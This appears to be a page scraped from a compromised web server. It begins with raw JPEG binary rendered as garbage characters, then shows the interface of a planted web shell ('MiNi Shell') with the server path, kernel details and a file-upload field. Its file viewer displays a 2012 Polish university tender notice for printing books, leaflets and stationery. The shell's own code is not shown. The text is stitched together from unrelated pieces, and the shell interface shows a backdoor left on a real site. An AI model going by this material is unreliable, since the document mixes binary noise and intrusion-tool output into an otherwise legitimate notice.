JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120223/54422-N-2012.html

<p class="kh_header"><b>Wałbrzych: Druk książek i materiałów reklamowych</b><br>
<b>Numer ogłoszenia: 54422 - 2012; data zamieszczenia: 23.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa w Wałbrzychu , ul. Zamkowa 4, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 6419200, faks 074 6419202.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwsz.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk książek i materiałów reklamowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest druk (wykonanie z własnych materiałów) i dostawa do siedziby Zamawiającego na koszt własny książek i innych materiałów na rzecz Zamawiającego zgodnie z podanym poniżej zestawieniem
1. 
Tytuł: Z dziejów opozycji demokratycznej
Format: B5
Liczba stron: 224
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: czerwiec 2012
Posiada nr ISBN
2.
Tytuł: Sieć bezpieczeństwa finansowego
Format: B5
Liczba stron: 288
Liczba egzemplarzy: 300
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: kwiecień 2012
Posiada nr ISBN
3.
Tytuł: Od teorii prawa do prawa
Format: B5
Liczba stron: 144
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: czerwiec 2012
Posiada nr ISBN
4.
Tytuł: Prawo w administracji
Format: B5
Liczba stron: 160 
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: grudzień 2012
Posiada nr ISBN
5.
Tytuł: Czas na wychowanie
Format: B5
Liczba stron: 240
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: listopad 2012
Posiada nr ISBN
6.
Tytuł: Pytanie o przyszłość rodziny
Format: B5
Liczba stron: 240
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: maj 2012
Posiada nr ISBN
7.
Tytuł: Współczesne wyzwania logistyki, z. 3
Format: B5
Liczba stron: 192
Liczba egzemplarzy: 200
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: sierpień 2012
Posiada nr ISBN
8. 
Tytuł: Turystyka a zdrowie
Format: B5
Liczba stron: 160
Liczba egzemplarzy: 100
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie
Korpus: klejony
Termin oddania do druku: czerwiec 2012
Posiada nr ISBN
9.
Tytuł: Logistyka produkcji
Format: B5
Liczba stron: 128
Liczba egzemplarzy: 200
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: kwiecień 2012
Posiada nr ISBN
10.
Tytuł: Logistyka zaopatrzenia
Format: B5
Liczba stron: 128
Liczba egzemplarzy: 200
Kolor druku: 1+1
Papier: offset 80
Okładka: broszurowa do 250 g, kredowana jednostronnie, 4 kolory + foliowanie 
Korpus: klejony
Termin oddania do druku: maj 2012
Posiada nr ISBN
11.
Tytuł: Ród Czettritzów
Rodzaj publikacji: album
Format: 19x19 cm
Liczba stron: 96
Liczba egzemplarzy: 300
Kolor druku: 4+4
Papier: kolor kremowy, kreda 130 g 
Okładka: twarda, 4 kolory, całopłócienna, kolor bordowy, uszlachetnienie 1 strony okładki: tłoczenie suchym tłokiem+ złocenie
Obwoluta: ze skrzydełkami, kolor druku: 4+0, lakier, złocenie 
Korpus: szyty, zaokrąglony
Termin oddania do druku: czerwiec 2012
Posiada nr ISBN
12.
Teczka z grafikami (20 kart grafik w teczce) 
Teczka: kolory: 4 +0, wykończenie folia, sztywny karton 300 g bielony dwustronnie
Środek: 20 kart formatu A4, kolor druku: 4+1, papier 300 g
Liczba kompletów: 200
13.
Tytuł: Sielesius Info
Rodzaj publikacji: kwartalnik (4 numery w ciągu roku)
Format: A4
Liczba stron: 16
Liczba egzemplarzy: 4 x 200 = 800
Kolor druku: 4+4
Papier: kreda 130 g
Okładka: lakierowana, błysk
Korpus: szyty metalowym spinaczem
Termin oddania do druku: marzec, czerwiec, wrzesień, grudzień
Posiada nr ISSN
14.
Ulotka rekrutacyjna
Format: A4, łamanie na 3 do środka
Kolor druku: 4+4
Papier: kredowany 180 g, błysk
Liczba sztuk: 3 000 szt. (druk w 2 transzach po 1 500 egz.)
zastrzegamy sobie prawo do zmiany plików w każdej z transzy 

15.
Informator rekrutacyjny
Format: 21x15 cm
Liczba stron: 40
Korpus: szyty metalowym spinaczem
Kolor druku: 4 +4 
Papier: kredowy 130 g
Okładka: kreda, 4 + 4, foliowanie
Liczba sztuk: 9 000 szt. (druk w trzech transzach)
zastrzegamy sobie prawo do zmiany plików w każdej z transzy 
16.
Plakat rekrutacyjny
Format: A3
Kolor druku: 4 + 0
Papier: kredowy błyszczący 170 g
Liczba sztuk: 100 szt.
17.
Ulotka reklamowa
Format: A4, łamanie na 3 do środka
Kolor druku: 4+4
Papier: kredowy błyszczący 135 g
Maksymalna liczba sztuk: 1 000 szt. (druk w zależności od potrzeb, druk jednorazowy nie mniej niż 20 szt.)
18.
Plakaty wielkoformatowe
Format: A1
Kolor druku: 4 + 0
Papier: kredowany 170 g
Liczba sztuk: 200 szt. (druk w zależności od potrzeb w ciągu całego roku, zastrzegamy sobie prawo do druku na życzenie pojedynczych egzemplarzy)
19.
Wizytówki
Format: 90x50 mm
Kolor druku: 4+0
Papier: karton biały matowy obustronnie powlekany 245 g
Liczba: 1 000 szt. (druk w zależności od potrzeb, za każdym razem inne dane osobowe, druk jednorazowy nie mniej niż 20 szt.)
20.
Kartki świąteczne
Format: 2xDL (składane do DL)
Papier: kreda 300 g
Kolor: 4+4
Liczba sztuk: 500 szt.* (druk w dwóch transach, zastrzegamy sobie prawo do zmiany plików w każdej z transzy)
Uszlachetnienie: lakier wybiórczy
Łamanie: 1 zagięcie
21.
Papier firmowy
Format: A4
Papier: offset 90g
Kolor druku: 4+0
Liczba sztuk: 5000
22.
Bloczki reklamowe kolorowe
Format: A4
Liczba kartek: 50
Kolor druku: 4+0
Papier: offset 80g
Klejenie: po krótszym boku
Z tyłu kartonik dla usztywnienia bloku
Liczba sztuk: 500
23. 
Bloczki reklamowe czarno-białe
Format: A4
Liczba kartek: 50
Kolor druku: 1+0
Papier: offset 80g
Klejenie: po krótszym boku
Z tyłu kartonik dla usztywnienia bloku
Liczba sztuk: 500
24.
Bloczki reklamowe kolorowe
Format: A5
Liczba kartek: 50
Kolor druku: 1+0
Papier: offset 80g
Klejenie: po krótszym boku
Z tyłu kartonik dla usztywnienia bloku
Liczba sztuk: 500
25.
Bloczki reklamowe czarno-białe
Format: A5
Liczba kartek: 50
Kolor druku: 1+0
Papier: offset 80g
Klejenie: po krótszym boku
Z tyłu kartonik dla usztywnienia bloku
Liczba sztuk: 500
26.
Koperty firmowe z nadrukiem
Papier: offset 90 g
Kolor: białe, samoprzylepne
Nadruk: 
przód koperty - 4 kolory, dane adresowe, rysunek na dole koperty wzdłuż dłuższego boku
tył koperty - 1 kolor, zwarty blok tekstowy 1-3 szerokości koperty
Druk bezspadowy
Typ koperty: normal
Format koperty	:
DL - 1 000 szt.	
C6 - 500 szt.
C5 - 2 000 szt.
C4 - 2 000 szt.

Zamawiający dostarczy prace w postaci plików pdf lub ps oraz projekty gotowych okładek w programach graficznych. Wykonawca zobowiązany jest do udostępnienia Zamawiającemu dostępu do serwera FTP celem przesłania plików do druku.

W odniesieniu do pozycji 1-11 Zamawiający zastrzega sobie prawo wycofania ich z przetargu w przypadku niewywiązania się przez autora z narzuconych terminów bądź otrzymania negatywnej recenzji wydawniczej przez niezależnego recenzenta. Zamawiający zastrzega sobie prawo do wydrukowania pozycji zamiennej, której parametry techniczne będą porównywalne z pozycją wycofaną. Zamawiający na  3 dni przed zleceniem druku pozycji książkowych poinformuje o tym wykonawcę.
Zamawiający zastrzega sobie prawo zmian w granicach 10% w liczbie stron poszczególnych pozycji.

Podane w pozycjach 12-26 ilości druku poszczególnych pozycji są ilościami maksymalnymi, które mogą być zlecone do druku przez Zamawiającego. Zamawiający zastrzega sobie prawo do zlecenia druku minimum 50% każdej z tych pozycji oraz zastrzega sobie prawo do rezygnacji ze zlecenia druku pozycji nr 23, 25.
W przypadku ujawnienia przy odbiorze poszczególnych pozycji przedmiotu zamówienia wad lub błędów w druku za które winę ponosi Wykonawca, zobowiązany jest on do ich bezpłatnego usunięcia w terminie 7 dni od stwierdzenia wady. Wszelkie koszty dostaw poszczególnych zamówień ponosi Wykonawca..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający informuje, że przewiduje możliwość udzielenia zamówienia uzupełniającego w okresie 3 lat od udzielenia zamówienia podstawowego polegającego na dodruku wybranych pozycji książkowych zawartych w poz. 1-11 oraz poz. nr 15 powyższego zestawienia. Zamówienie uzupełniające nie przekroczy 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy powinni udokumentować posiadanie wiedzy i doświadczenia przez wykazanie realizacji przynajmniej dwóch zamówień polegających na druku książek, materiałów reklamowych itp. o wartości nie mniejszej niż 30 000,00 zł brutto każde - zgodnie z załącznikiem nr 6 do SIWZ. Do wykazu należy załączyć dokumenty potwierdzające, że zamówienia te zostały wykonane lub są wykonywane należycie- np. referencje
Ocena spełnienia tego warunku przeprowadzona zostanie przy pomocy formuły spełnia-nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pwsz.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, 58-300 Wałbrzych
ul. Zamkowa 4, pok. nr 301.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 10:00, miejsce: Państwowa Wyższa Szkoła Zawodowa im. Angelusa Silesiusa, 58-300 Wałbrzych
ul. Zamkowa 4, pok. nr 301.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com